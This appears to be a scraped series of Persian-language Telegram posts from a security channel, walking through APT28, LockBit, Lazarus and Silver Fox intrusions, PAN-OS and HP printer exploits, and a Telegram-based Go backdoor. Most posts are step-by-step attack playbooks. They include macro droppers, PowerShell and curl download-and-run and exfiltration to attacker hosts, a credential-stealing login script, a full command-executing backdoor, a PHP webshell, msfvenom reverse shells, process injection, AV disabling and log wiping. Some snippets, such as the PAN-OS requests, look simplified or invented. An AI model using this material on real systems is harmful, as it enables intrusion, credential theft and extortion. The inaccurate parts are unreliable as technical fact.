روش نفوذ بهصورت "Zero-Click" انجام شده؛ به این معنی که تارگت بدون نیاز به کلیک یا تعامل با محتوای مخرب، آلوده شده. تو این روش، هکرها فایلای PDF حاوی کدهای مخرب رو برای تارگت ارسال کردن که با باز کردن این فایلا، جاسوسافزار بهصورت خودکار فعال میشده.
جاسوسافزار Graphite، محصول Paragon، قادره به دیتای شخصی کاربرا دسترسی پیدا کنه، از جمله:
Please open Telegram to view this post
VIEW IN TELEGRAM
Castbox
اپیزود 22: رادیو امنیت: معرفی شرکت جاسوسی سایبری NSO
<p>در این قسمت از برنامه رادیو امنیت گروه لیان، با یکی از معروفترین و همچنین ترندترین شرکتهای جاسوسی سایبری دنیا، یعنی شرکت اِناِساو آشنا میشیم و ب...
👍11❤🔥4❤2👌1😍1🌚1
یکی از متودولوژیهایی که تو این حوزه شناخته شدهاس، فریمورک STRIDE هست که توسط شرکت مایکروسافت توسعه داده شده و برای شناسایی، دستهبندی و ارزیابی تهدیدات امنیتی تو سیستمهای نرمافزاری و شبکهها ازش استفاده میشه.
تو این حمله، مهاجم هویت یه کاربر، فرآیند یا سیستم دیگه رو جعل میکنه تا دسترسی غیرمجاز به اطلاعات و منابع داشته باشه.
تو این حمله، مهاجم دیتاهای تو حال ترنسفر یا ذخیرهشده رو تغییر میده تا اطلاعات مخرب یا نادرست جایگزین بشن.
این نوع تهدید وقتی رخ میده که کاربر یا مهاجم بعد از انجام یه عملیات، اون رو انکار کنه و سیستم مدرکی برای اثبات اون نداشته باشه.
این نوع تهدید وقتی رخ میدهه که دیتاهای محرمانه در اختیار افراد غیرمجاز قرار بگیرن.
این نوع حمله باعث میشه که یه سیستم یا سرویس، دیگه تو دسترس کاربرای مجاز نباشه.
تو این حمله، مهاجم دسترسیهای خودش رو از سطح عادی به سطح مدیر (Administrator) افزایش میده.
پ.ن: این محتوا برگرفته از کتاب "راهنمای معماری امنیت سایبری" هست. برای تهیه این کتاب میتونین به آیدی @liantrain پیام بدین.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤3👌3👏1🎉1🕊1🌚1💯1🏆1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5⚡3❤2🔥1🤔1🎉1🤩1🕊1🤡1💯1🏆1
مهاجم میتونه با ارسال یک درخواست (HTTP Request) دستکاریشده به سرور PAN-OS، احراز هویت رو دور بزنه.
GET /php/system.php HTTP/1.1
Host: target-firewall
User-Agent: Mozilla/5.0
ریکوئست بالا بدون نیاز به لاگین، به سرور ارسال میشه و تو بعضی نسخههای آسیبپذیر، سرور پاسخ معتبر ارسال میکنه. اگه این صفحه مدیریتی دسترسی به اسکریپتهای PHP داشته باشه، مهاجم میتونه دستورات مخرب اجرا کنه.
از اونجایی که PAN-OS بعضی اسکریپتهای PHP اجرایی داره، اگه مهاجم موفق بشه از صفحات بدون احراز هویت ریکوئستهایی بفرسته که به پارامترهای ورودی PHP دسترسی دارن، میتونه کد دلخواه رو اجرا کنه.
GET /php/admin.php?cmd=whoami HTTP/1.1
Host: firewall-target
اگر سرور پاسخ بده:
admin
نشان میده که مهاجم میتونه دستورات سیستمی رو روی سرور اجرا کنه.
اگه مهاجم موفق به ارسال ریکوئست معتبر بدون احراز هویت بشه، میتونه:
یه کاربر جدید تو سیستم ایجاد کنه.
رولهای فایروال رو تغییر بده و ترافیک رو به نفع خودش route کنه.
تنظیمات لاگ رو غیرفعال کنه تا فعالیتهای مخرب شناسایی نشه.
مثال درخواست مخرب برای ایجاد یه کاربر جدید:
POST /php/api.php HTTP/1.1
Host: target-firewall
Content-Type: application/json
{
"action": "createUser",
"username": "hacker",
"password": "SuperSecretPass",
"role": "admin"
}
اگه سرور آسیبپذیر باشه، ریکوئست بالا یه حساب ادمین جدید برای مهاجم ایجاد میکنه.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👌5👍4🔥2👏1
آسیبپدیری با شناسه CVE-2025-26506 تو پرینترهای HP شناسایی شده. این آسیبپذیری از نوع Stack-Based Buffer Overflow - CWE-121ه که موقع پردازش فایلهای PostScript تو پرینترهای HP رخ میده. تو این نوع حمله، ورودی فراتر از اندازه بافر تعیینشده به داخل استک نوشته میشه، که در صورت اکسپلویت موفق، میتونه منجر به RCE بشه. هکر میتونه با ارسال یه فایل PostScript مخرب، کد دلخواهش رو بصورت ریموت اجرا کنه و سطح دسترسیش رو افزایش بده.
مهاجم برای اکسپلویت این آسیبپذیری، یه فایل PostScript مخرب رو به پرینتر ارسال میکنه. این کارو میتونه از طریق روشهای زیر انجام بده:
پس از پردازش فایل، مقدار زیادی دیتا به بافر استک نوشته میشه که باعث خرابی حافظه میشه و کنترل پردازش رو به هکر منتقل میکنه.
هکر ابتدا باید تعیین کنه که آیا پرینتر هدف، جز مدلهای آسیبپذیر هست یا نه. این کار از طریق دو روش زیر میتونه انجام بشه:
اسکن شبکه با استفاده از ابزارهایی مثل nmap:
nmap -p 9100,515,631 -A -T4 <target-IP>
or
nmap -p 9100,515,631 --noscript hp-jetdirect-info -O -sV <target-IP>
اگه پورت 9100 (JetDirect), پورت 515 (LPD) یا 631 (IPP) باز باشه، پرینتر مستعد حملهاس.
بررسی بنر دستگاه:
nc <target-IP> 9100
بعضی پرینترها تو ریسپانس، اطلاعات مربوط به مدل و فریمور رو ارسال میکنن.
پستاسکریپت یه زبان توصیف صفحهاس که توسط خیلی از پرینترها پشتیبانی میشه. یه نمونه کد مخرب برای سرریز بافر میتونه به این شکل باشه:
%!PS
% ایجاد یه حلقه بیپایان برای افزایش بار پردازش
userdict begin
100 dict begin
/Buffer 1024 string def
0 1 20000 {
Buffer (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) putinterval
} for
end
end
این کد بافر استک رو بیش از حد پر میکنه و باعث کرش یا اجرای کد دلخواه میشه.
مهاجم میتونه فایل رو با یکی از روشهای زیر به پرینتر ارسال کنه:
از طریق Netcat:
nc <target-IP> 9100 < exploit.ps
از طریق LPD (Line Printer Daemon):
lpr -H <target-IP> -P raw -o raw exploit.ps
یا اگه پرینتر به شبکهای با ایمیل متصل باشه، مهاجم میتونه فایل رو تو قالب یه پیوست برای پرینتر ارسال کنه.
در صورت موفقیت، این حمله میتواند:
اگه مهاجم کنترل یه پرینتر متصل به شبکه داخلی سازمان رو به دست بگیره، میتونه:
یک. MITM Attack: ترافیک اسناد چاپی رو رهگیری و تغییر بده.
دو. Pivot Attack: از پرینتر به عنوان نقطه محوری برای نفوذ بیشتر به شبکه استفاده کنه.
سه. Backdoor Installation: از پرینتر برای ایجاد یک نقطه دسترسی دائمی به شبکه سازمان بهره ببره.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍6👏2🎉2👌2
میخوام سه سناریو واقعی از نفوذهای گروه APT28 رو بزارم. موافقین؟
Anonymous Poll
89%
بله. خیلی میتونه مفید باشه.
4%
نه. به درد نمیخوره.
7%
نظر خاصی ندارم.
گروه APT28 از Spear Phishing برای نفوذ اولیه تو این سناریو استفاده کرده. یه ایمیل رسمی فیک به کارمندا ارسال شده که به نظر میرسیده از طرف یه سازمان بینالمللی معتبر مثل EU External Action Service (EEAS) باشه.
فایل آلوده (Macro-Enabled Document)
ایمیل شامل یه فایل Word آلوده بوده که از ماکرو VBA مخرب استفاده میکرده. بعد از باز شدن فایل، ماکرو فعال میشده و PowerShell رو برای دانلود بدافزار اجرا میکرده:
Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File C:\Users\Public\update.ps1"
End Sub
فایل update.ps1 که یه اسکریپت پاورشل رمزگذاریشده بوده؛ بدافزار اصلی رو دانلود میکرده:
$download = New-Object System.Net.WebClient
$url = "https://malicious-server.com/payload.exe"
$path = "$env:APPDATA\Microsoft\Windows\update.exe"
$download.DownloadFile($url, $path)
Start-Process -FilePath $path
ویژگیهای بدافزار Seduploader
- بررسی سیستم: اطلاعات اولیه (مثل نسخه ویندوز، یوزرنیم، پردازنده) رو جمعآوری میکنه.
- اجرای دستورات از راه دور (Remote Command Execution)
- ثبت کلیدهای زدهشده (Keylogging)
- آپلود و دانلود فایلهای مخرب
- استفاده از DNS Tunneling برای ارسال اطلاعات به سرور C2
ارتباط با سرور C2 با استفاده از DNS Tunneling
بدافزار Seduploader از ریکوئستهای DNS برای ارسال اطلاعات به سرور C2 استفاده میکنه:
nslookup -type=TXT x7c9.malicious-domain.com
دیتاها به صورت Base64 یا XOR Encoding انکریپت شدهان.
یک. Credential Dumping با استفاده از Mimikatz
بعد از استقرار اولیه، APT28 از ابزار Mimikatz برای سرقت هشهای رمزعبور استفاده کرده:
privilege::debug
sekurlsa::logonpasswords
دو. Pass-the-Hash (PTH) برای دسترسی به سایر سیستمها
اعضای APT28 با استفاده از هشها به سیستمهای دیگه متصل میشدن:
psexec \\target-system -u administrator -p NTLMHASH cmd.exe
سه. Pivoting با PowerShell Empire
با دسترسی به یه سیستم جدید، برای ایجاد ارتباط مستقیم، از PowerShell Empire استفاده میشده:
Invoke-PsExec -ComputerName target-system -Command "net user /add backdoor P@ssw0rd"
ارسال دیتاهای سرقتشده با پاورشل
$bytes = [System.IO.File]::ReadAllBytes("C:\sensitive_data.pdf")
Invoke-WebRequest -Uri "https://malicious-server.com/upload" -Method POST -Body $bytesاعضای گروه APT28 موفق به استخراج اطلاعات حساس دیپلماتیک شدن.
Please open Telegram to view this post
VIEW IN TELEGRAM
👌12👍4🤩4🔥3💯3🍌3❤1❤🔥1⚡1👏1
گروه APT28 (Fancy Bear) تو سال 2016 حملهای پیشرفته به کمیته ملی دموکرات (DNC) انجام داد که منجر به نشت اطلاعات حساس از ایمیلهای مقامات عالیرتبه حزب دموکرات شد. این حمله یه عملیات پیچیده جاسوسی سایبری بود که شامل مهندسی اجتماعی، اکسپلویت آسیبپذیریها، نصب بدافزار، حرکت جانبی (lateral movement) و استخراج دیتاها بود. دیتاهای سرقت شده در نهایت توسط WikiLeaks منتشر شد که تأثیر زیادی روی انتخابات آمریکا گذاشت.
گروه APT28 از حملات Spear Phishing برای Credential Harvesting کارمندای DNC استفاده کرده. ایمیلهای فیکی که شبیه هشدارهای امنیتی گوگل بودن، برای مقامات ارسال شدن. هدف این بوده که اونا رو وادار به وارد کردن یوزرنیم و پسوردشون تو یه صفحه لاگین فیک کنن.
Subject: Unauthorized Access Detected – Change Your Password Immediately
From: Google Security Team <no-reply@security-google.com>
گروه APT28 صفحهای که مشابه صفحه لاگین گوگل بوده رو طراحی کرده. این صفحه از طریق HTML و JavaScript اطلاعات لاگین تارگت رو سرقت میکرده. یه نمونه از کد JavaScript تو صفحه لاگین فیک:
document.getElementById("login").onsubmit = function() {
fetch("https://malicious-site.com/steal", {
method: "POST",
body: JSON.stringify({
email: document.getElementById("email").value,
password: document.getElementById("password").value
})
});
};گروه APT28 از سرویسهای کوتاهکننده URL (مثل Bit.ly) برای مخفی کردن آدرس واقعی صفحه فیک استفاده کرده. مثال لینک مخرب:
https://bit.ly/secure-google-login
پس از دستیابی به پسوردها چه اتفاقی میافته؟
بعد از سرقت اعتبارنامهها، اعضای گروه تونستن به حسابهای ایمیل کارمندای DNC دسترسی پیدا کنن. اما این آخر کار نبود؛ برای کنترل گستردهتر، APT28 نیاز داشته که کنترل سیستمهای داخلی DNC رو هم در اختیار بگیره. به همین خاطر اونا بدافزار X-Agent رو مستقر میکردن.
بدافزار X-Agent با استفاده از PowerShell و رجیستری ویندوز به صورت مخفی اجرا میشده.
$wc = New-Object System.Net.WebClient
$url = "https://malicious-server.com/xagent.exe"
$path = "$env:APPDATA\chrome_update.exe"
$wc.DownloadFile($url, $path)
Start-Process -FilePath $path -WindowStyle Hidden
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v chrome_update /t REG_SZ /d C:\Users\Public\chrome_update.exe
POST /command.php HTTP/1.1
Host: malicious-server.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
cmd=upload&file=/Users/Admin/Documents/confidential.pdf
چطور اعضای گروه تونستن کل شبکه DNC رو آلوده کنن؟
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
psexec \\target-system -u administrator -p NTLMHASH cmd.exe
اجرای Pivoting با PowerShell Empire
Invoke-PsExec -ComputerName target-system -Command "net user /add hacker P@ssw0rd"
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13👏4❤3💯3🔥1
چطور اطلاعات سرقتشده رو به بیرون ارسال کردن؟
گروه APT28 اطلاعات سرقتشده رو از طریق پروتکل HTTPS رمزگذاریشده و DNS Tunneling به سرورهای خودش ارسال میکرده.
$bytes = [System.IO.File]::ReadAllBytes("C:\sensitive_data.pdf")
Invoke-WebRequest -Uri "https://malicious-server.com/upload" -Method POST -Body $bytesnslookup -type=TXT a1b2c3d4.example.com
zip -e stolen_data.zip confidential.pdf
cat stolen_data.zip | xor 0x55 > encoded_data.dat
curl -X POST --data-binary @encoded_data.dat https://malicious-server.com/upload
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13⚡3🔥3👏2❤1🎉1💯1
گروه APT28 یکی از معدود گروههاییه که بهطور خاص سیستمعامل macOS رو هدف قرار داده. تو حملهای که علیه ناتو و سازمانهای مرتبط با اون انجام شد، اونا از بدافزار Komplex برای نفوذ و سرقت اطلاعات استفاده کردن.
این گروه یه PDF آلوده رو طراحی کرد که از یک حملهی Exploit-Based بهره ببره.
فایل شامل یه اسکریپت JS مخربه که از یه آسیبپذیری تو Adobe Reader استفاده میکرده. این اسکریپت باعث اجرای کد مخرب تو سطح سیستمعامل macOS شده.
this.submitForm("file:///System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister");system("/usr/bin/curl -o /tmp/update http://malicious-server.com/malware");
system("chmod +x /tmp/update; /tmp/update");این کد از curl برای دانلود بدافزار و از chmod برای اجرای اون استفاده میکنه.
mkdir -p ~/Library/LaunchAgents
echo '
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.Komplex</string>
<key>ProgramArguments</key>
<array>
<string>/Users/victim/.Komplex/Komplex</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>' > ~/Library/LaunchAgents/com.apple.Komplex.plist
این فایل Launch Agent تو macOS باعث میشه که بدافزار بهطور خودکار تو هر بار بوت اجرا بشه.
echo "/Users/victim/.Komplex/Komplex &" >> ~/.bash_profile
POST /connect HTTP/1.1
Host: malicious-server.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
cmd=upload&file=/Users/Admin/Documents/confidential.pdf
curl -s https://malicious-server.com/command | sh
این دستور هر بار از سرور یه اسکریپت جدید دریافت و اجرا میکنه.
ls -la ~/Documents/ > /tmp/list.txt
curl -X POST --data-binary @/tmp/list.txt https://malicious-server.com/upload
security find-generic-password -ga "WiFi" | grep "password"
ssh user@target-system "curl -s https://malicious-server.com/komplex | bash"
tar -czvf confidential.tar.gz ~/Documents/
openssl enc -aes-256-cbc -salt -in confidential.tar.gz -out encrypted_data.enc -k StrongPassword
curl -X POST --data-binary @encrypted_data.enc https://malicious-server.com/upload
rm -rf ~/.bash_history
rm -rf /tmp/list.txt
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20👏4⚡3❤2❤🔥2👌2🎉1💯1
سلام دوستان عزیز.
برای اینکه محتوای این کانال ادامهدار و همچنین گستردهتر بشه، دنبال جمعکردن یه تیم برای تولید محتوای تخصصی (بحث آموزشی نیست بلکه تحلیلی و انتقال تجربهاس) هستم. اگه:
۱. اگه تو حوزه امنیت دارین فعالیت میکنین
۲. وقت و حوصله دارین
۳. ایده برای تولید محتوا دارین
۴. میخواین رو پرسونال برندینگتون کار کنین
به آیدی من (@vahid_elmi) پیام بدین تا بیشتر باهم صحبت کنیم.
نکته: هیچ پلن درآمد مستقیمی روی این کانال وجود نداره و هر محتوایی که تولید بشه رایگان تو دسترس عموم قرار میگیره.
🔫 🔫 🔫 🔫 🔫 🔫 🔫 🔫 🫡 🔫 🔫
⏩ @CyberWarfar
برای اینکه محتوای این کانال ادامهدار و همچنین گستردهتر بشه، دنبال جمعکردن یه تیم برای تولید محتوای تخصصی (بحث آموزشی نیست بلکه تحلیلی و انتقال تجربهاس) هستم. اگه:
۱. اگه تو حوزه امنیت دارین فعالیت میکنین
۲. وقت و حوصله دارین
۳. ایده برای تولید محتوا دارین
۴. میخواین رو پرسونال برندینگتون کار کنین
به آیدی من (@vahid_elmi) پیام بدین تا بیشتر باهم صحبت کنیم.
نکته: هیچ پلن درآمد مستقیمی روی این کانال وجود نداره و هر محتوایی که تولید بشه رایگان تو دسترس عموم قرار میگیره.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥15👍8🤡6❤3👎2🌭2🔥1👏1
لاکبیت یکی از پیچیدهترین گروههای باجافزاریه که تاکتیکهای پیشرفتهای رو برای نفوذ، رمزگذاری، و اخاذی از سازمانها پیادهسازی میکنه. تو یکی از حملاتی که این گروه انجام داده، اونا تونستن از طریق یه VPN ناامن به شبکهی یه شرکت خودروسازی صنعتی نفوذ کنن. تو این حمله، اونا به خطوط تولید، دیتابیس تأمینکنندگان و مستندات محرمانهی طراحی خودروها دسترسی پیدا کردن و در نهایت با رمزگذاری گسترده سیستمها، از قربانی درخواست باج کردن.
subfinder -d company-auto.com -o subdomains.txt
ابزار subfinder برای پیداکردن سابدومینهای فعال، از جمله vpn.company-auto.com استفاده شد.
nmap -p 443 --noscript sslvpn-fortigate.nse vpn.company-auto.com
این دستور نشون میداد که Fortinet VPN روی پورت 443 در حال اجراست.
python fortinet-exploit.py --target vpn.company-auto.com
اسکریپت به هکرها اجازه میداد تا بدون نیاز به MFA وارد بشن.
openvpn --config company-vpn.ovpn --auth-user-pass creds.txt
پس از بهدست آوردن دسترسی، هکرها وارد شبکهی داخلی سازمان شدن.
nltest /dclist:company-auto.com
لیست سرورهای Domain Controllers مشخص شدن.
Get-ADUser -Filter * -Properties Name,Email,LastLogonDate
این دستور لیستی از حسابهای کاربری رو نمایش میداد.
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
این ابزار اطلاعات حسابهای مدیر شبکه رو استخراج میکرد.
psexec \\production-server -u administrator -p NTLMHASH cmd.exe
حالا هکرها کنترل سرورهای تولید خودرو رو در اختیار داشتن.
Set-MpPreference -DisableRealtimeMonitoring $true
آنتیویروس ویندوز خاموش شد.
vssadmin delete shadows /all /quiet
تمام نسخههای بکاپ حذف شد.
Invoke-Command -ComputerName * -ScriptBlock { Start-Process "C:\Windows\System32\lockbit.exe" }این دستور باجافزار رو روی تموم کامپیوترهای دامین اجرا میکرد.
EXEC xp_cmdshell 'LockBit-Encrypt.exe -path C:\SQL-Data\'
تمام اطلاعات تأمینکنندگان قفل شد.
MODBUS_WRITE -slave 1 -register 40001 -value 9999
دیتاهای کنترلکنندههای PLC تو خط تولید تغییر داده شد.
Get-ChildItem "C:\Designs\Confidential" -Recurse | Compress-Archive -DestinationPath C:\Temp\designs.zip
scp /Temp/designs.zip attacker@malicious-server:/data/
Your company has been hacked by LockBit.
All your data is encrypted and stolen.
Pay 30 BTC or we will leak your secret designs.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤12👏5👌4🔥1🤣1
تو دو سه روز گذشته خبری منتشر شده که هکرهای منتسب به کره شمالی، دولوپرای فریلنسر رو مورد هدف قرار دادن. این گروهها و به ویژه لازاروس، اخیراً دولوپرای فریلنسری رو از طریق آفرهای شغلی فیک هدف قرار دادهان تا بدافزارها رو تو سیستمهای اونا مستقر کنن. این حملات با استفاده از تکنیکهای مهندسی اجتماعی، اکسپلویتهای زیرودی، فیشینگ و بدافزارهای مخفی انجام میشن. این حمله رو تو دو قسمت و 5 مرحله باهم بررسی میکنیم:
هکرهای کره شمالی از ابزارهای OSINT برای جمعآوری اطلاعات در مورد دولوپرای فریلنسر و برنامهنویسایی که تو شرکتهای بزرگ فناوری کار میکنن، استفاده میکنن.
theHarvester -d example.com -b linkedin
spiderfoot -s example.com -m social
هکرها یه پروفایل فیک از شرکتهای معتبر ایجاد کرده و از طریق ایمیل، لینکدین یا پلتفرمهای فریلنسری به دولوپرا پیشنهاد کار میدن.
From: hr@google-careers.com
To: developer@example.com
Subject: Exciting Job Opportunity - Senior Software Engineer
Hello [Developer Name],
We have reviewed your GitHub projects and believe you would be a great fit for our new AI initiative at Google. Please find the attached job denoscription and coding test.
Best regards,
Google HR Team
نمونهای از کد مخرب تو آزمون کدنویسی (Python):
import os
import requests
# دریافت کدهای مخرب از سرور هکر
payload = requests.get("http://attacker.com/malware.py").text
exec(payload) # اجرای کد مخرب
config domain attacker.com
phishlets enable github
phishlets hostname github.attacker.com
lures create github
lures edit 0 set url https://github.com/login
lures get-url 0
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥5❤🔥3👌2💯2❤1🤔1😍1🤓1
روشهای استقرار بدافزار
هکرها فایلهای ورد یا اکسل حاوی ماکروهای مخرب ارسال میکنن. وقتی که تارگت ماکرو رو فعال کنه، یه بدافزار دانلود و اجرا میشه.
کد VBA مخرب تو فایل ورد برای دانلود بدافزار:
Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand <کد_پایه64>"
End Sub
msfvenom -p windows/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > job_offer.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST attacker.com
set LPORT 443
run
بعد از دسترسی به سیستم، سرقت هشهای NTLM برای حرکت جانبی تو شبکه:
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
sqlite3 ~/.mozilla/firefox/*.default/cookies.sqlite "SELECT host, name, value FROM moz_cookies"
dnscat2 --dns attacker.com
$webclient = New-Object System.Net.WebClient
$webclient.UploadFile("http://attacker.com/upload", "C:\Users\Public\secrets.docx")
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
Remove-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
del /F /Q /S C:\Users\Public\malware.exe
این حمله نشون میده که هکرهای کره شمالی از روشهای پیشرفتهی فریب و بدافزارهای پیچیده برای سرقت اطلاعات و ایجاد نفوذهای بلندمدت تو سیستمها استفاده میکنن. دولوپرا و فریلنسرها باید بیشتر از همیشه نسبت به حملات فیشینگ و پیشنهادهای شغلی مشکوک هوشیار باشن.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14🔥4❤2🥰2🙏2👨💻2🤔1👌1🍌1
تو چن روز گذشته، محققای امنیت سایبری یه بکدور جدید مبتنی بر زبان برنامهنویسی Go (Golang) رو شناسایی کردن که از API ربات تلگرام برای برقراری ارتباطاتC2 استفاده میکنه. تو این پست میخوایم کمی این مورد رو بررسی فنیتر انجام بدیم که این تحلیل شامل راهاندازی سرور C2 با استفاده از تلگرام، روشهای دور زدن شناسایی، و ابزارهای مورد استفاده تو این حملهاس.
برای استفاده از API تلگرام به عنوان مرکز C2، باید مراحل زیر رو طی کنیم:
برای تعامل با API تلگرام، از لایبرری github.com/go-telegram-bot-api/telegram-bot-api استفاده میکنیم.
نمونه کد برای دریافت دستورات از تلگرام و اجرای اونا تو سیستم قربانی:
package main
import (
"log"
"os/exec"
"github.com/go-telegram-bot-api/telegram-bot-api"
)
func main() {
bot, err := tgbotapi.NewBotAPI("YOUR_BOT_TOKEN")
if err != nil {
log.Fatal(err)
}
u := tgbotapi.NewUpdate(0)
u.Timeout = 60
updates, err := bot.GetUpdatesChan(u)
for update := range updates {
if update.Message == nil {
continue
}
cmd := update.Message.Text
output, err := exec.Command("sh", "-c", cmd).Output()
if err != nil {
output = []byte(err.Error())
}
msg := tgbotapi.NewMessage(update.Message.Chat.ID, string(output))
bot.Send(msg)
}
}
این کد پیامهای دریافتی از ربات تلگرام رو پردازش میکنه. هر پیام به عنوان یه دستور سیستم اجرا شده و خروجی اون به مهاجم ارسال میشه.
برای افزایش شانس اجرای موفقیتآمیز، چندین تکنیک دور زدن شناسایی به کار گرفته میشه.
GOOS=linux GOARCH=amd64 garble -literals build -o payload obfuscated.go
cp payload /usr/bin/systemd-networkd
chmod +x /usr/bin/systemd-networkd
echo '[Service]
ExecStart=/usr/bin/systemd-networkd
Restart=always' > /etc/systemd/system/networkd.service
systemctl enable networkd
systemctl start networkd
تو ویندوز، میشه از schtasks برای ایجاد یه تسک مخفی استفاده کرد:
schtasks /create /tn "WindowsUpdate" /tr "C:\Users\Public\malware.exe" /sc onlogon /ru SYSTEM /f
وقتی که نمیشه از تلگرام استفاده کرد، ngrok یه راه ارتباطی امن برای C2 فراهم میکنه.
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
./ngrok authtoken YOUR_AUTH_TOKEN
./ngrok tcp 4444
بعد از اجرای این دستور، ngrok یک آدرس tcp:// ایجاد میکنه که مهاجم میتونه برای ارتباط استفاده کنه.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - go-telegram-bot-api/telegram-bot-api: Golang bindings for the Telegram Bot API
Golang bindings for the Telegram Bot API. Contribute to go-telegram-bot-api/telegram-bot-api development by creating an account on GitHub.
👍13🔥7❤3😍2💯2🍌2⚡1❤🔥1🎉1🤣1
اگه دسترسی به سرور قربانی از طریق آسیبپذیریهای تحت وب ممکن باشه، میشه یه webshell مستقر کرد:
<?php echo shell_exec($_GET['cmd']); ?>
این شل رو میشه با curl استفاده کرد:
curl "http://victim.com/shell.php?cmd=whoami"
اگه سرویسهای آسیبپذیر به سرریز بافر پیدا بشن، میشه از ابزار msfvenom برای ساخت پیلود استفاده کرد:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=your-ip LPORT=4444 -f elf > payload.elf
و بعدش اونو تو سیستم هدف اجرا کرد:
chmod +x payload.elf
./payload.elf
برای جلوگیری از شناسایی، میشه از AES برای رمزگذاری ارتباطات استفاده کرد. نمونه کد رمزگذاری و رمزگشایی:
import (
"crypto/aes"
"crypto/cipher"
"encoding/hex"
)
func encrypt(data, key string) string {
block, _ := aes.NewCipher([]byte(key))
ciphertext := make([]byte, len(data))
stream := cipher.NewCTR(block, make([]byte, aes.BlockSize))
stream.XORKeyStream(ciphertext, []byte(data))
return hex.EncodeToString(ciphertext)
}
func decrypt(data, key string) string {
ciphertext, _ := hex.DecodeString(data)
block, _ := aes.NewCipher([]byte(key))
plaintext := make([]byte, len(ciphertext))
stream := cipher.NewCTR(block, make([]byte, aes.BlockSize))
stream.XORKeyStream(plaintext, ciphertext)
return string(plaintext)
}
برای اجرای مخفی تو ویندوز، میشه از regsvr32 استفاده کرد:
regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
این دستور باعث اجرای کد مخرب از طریق COM بدون ایجاد پردازش مشهود میشه.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍5💯3⚡1❤1👌1😍1🤣1🍌1
گروه Silver Fox APT از بدافزار Winos 4.0 برای نفوذ و کنترل سازمانهای تایوانی استفاده کرده. تو این گزارش، حمله رو از دیدگاه فنی بررسی میکنیم و ابزارها، تکنیکها، کدهای مخرب و روشهای استفادهشده رو تحلیل میکنیم.
theHarvester -d targetcompany.com -l 500 -b google
shodan search "port:3389 country:TW"
کد VBA مخرب تو فایل Word برای دانلود بدافزار Winos 4.0:
Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand <کد_پایه64>"
End Sub
هکرها از CVE-2024-20700 (آسیبپذیری RCE تو ویندوز) برای اجرای کد از راه دور استفاده کردن.
تست آسیبپذیری با Metasploit:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
استفاده از Hydra برای پیدا کردن پسوردهای ضعیف RDP
hydra -L user_list.txt -P password_list.txt rdp://target_ip
کد Winos 4.0 برای ایجاد ارتباط با سرور هکرها:
#include <windows.h>
#include <wininet.h>
int main() {
HINTERNET hInternet, hConnect;
hInternet = InternetOpen("Winos", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hConnect = InternetOpenUrl(hInternet, "http://attacker.com/payload.exe", NULL, 0, INTERNET_FLAG_RELOAD, 0);
if (hConnect) {
// دانلود و اجرای بدافزار اصلی
}
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
return 0;
}
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, target_pid);
LPVOID pRemoteCode = VirtualAllocEx(hProcess, NULL, payload_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, pRemoteCode, payload, payload_size, NULL);
CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > winos4.exe
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👍4🎉3❤2👏2👌2🕊1🏆1
